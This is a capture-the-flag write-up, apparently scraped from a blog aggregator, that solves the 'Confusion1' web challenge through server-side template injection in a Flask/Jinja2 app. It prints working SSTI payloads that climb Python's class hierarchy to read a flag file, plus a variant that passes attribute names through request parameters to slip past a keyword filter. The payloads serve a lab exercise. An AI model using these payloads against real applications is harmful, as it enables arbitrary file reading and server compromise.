当前位置:网站首页>[attack and defense world web] difficulty four-star 12 point advanced question: confusion1
[attack and defense world web] difficulty four-star 12 point advanced question: confusion1
2022-07-23 21:01:00 【Black zone (rise)】
3、 ... and 、Confusion1
How to solve the problem :
1、SSTI Loophole , structure payload
The process :
Elephant and The snake ( Really handsome )
php+python Thought of seeing many times SSTI Loophole
Go around first ( There are some information in this )
login and register All wrong
( But this must be a very important place )
see robot.txt( There's nothing )
Consider analyzing the source code of the page
login.php in Ctrl+U View page source code
Find out flag route
Analyze whether SSTI Loophole
{ {1+2}}
Calculated , The results of 3
SSTI Common injection
__class__() Returns the class of the object
__base__()/__mro__() Returns the base class inherited by the class
__subclasses__() Return all subclasses of the inherited class
pyaload:
{ {"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}
The filtered
structure payload
request yes Flask A global object of the framework , Express " The object of the current request ( flask.request ) "
request.args.key
args Is the parameter ,key Can be built-in functions
——————
payload:
{ {''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read
cyberpeace{a92d9e29b89ab062c895ddc06f237cb6}
边栏推荐
- 确定括号序列中的一些位置
- 1062 Talent and Virtue
- OpenLayers实例-Advanced View Positioning-高级视图定位
- Tropomi (sentinel 5p) data introduction and download method
- 高数下|二重积分的计算4|高数叔|手写笔记
- 221. 最大正方形 ●● & 1277. 统计全为 1 的正方形子矩阵 ●●
- Major optimization of openim - Message loading on demand, consistent cache, uniapp Publishing
- Read the five flow indicators of R & D efficiency insight
- vite3学习记录
- UnauthorizedAccessException:Access to the path “/xx/xx.xx“ is denied
猜你喜欢

Interpretation of Flink catalog

Vite3 learning records

高数下|三重积分的计算1|高数叔|手写笔记

Today's sleep quality record 81 points

【Kernel】驱动开发学习之Platform平台总线模型
![[wechat applet] do you know about applet development?](/img/3d/da58255aeb6bf6bc5021d988906bcc.png)
[wechat applet] do you know about applet development?

大三实习生,字节跳动面经分享,已拿Offer

jsp+ssm+mysql实现的租车车辆管理系统汽车租赁

Opencv image processing Laplace pyramid

Stm32c8t6 driven lidar (I)
随机推荐
手机股票开户安全吗?
ES6 feature: Promise (custom encapsulation)
The third slam Technology Forum - Professor wuyihong
Trial record of ModelBox end cloud collaborative AI development kit (rk3568) (II)
Green-Tao 定理 (3): 反一致函数及其生成的 Sigma-代数
Oom mechanism
[kernel] platform bus model for driving development and learning
Green-Tao 定理 (4): 能量增量方法
Cesium knockout怎么用?
Major upgrade of openim - group chat reading diffusion model release group management function upgrade
第3章业务功能开发(创建线索)
最小生成树:Kruskal
HDU - 2586 How far away ? (multiply LCA)
Stm32c8t6 driving lidar actual combat (II)
【攻防世界WEB】难度四星12分进阶题:FlatScience
【攻防世界WEB】难度四星12分进阶题:Confusion1
Vrrp+mstp configuration details [Huawei ENSP experiment]
Himawari-8 数据介绍及下载方法
OpenLayers实例-Advanced Mapbox Vector Tiles-高级Mapbox矢量贴图
Vite3 learning records










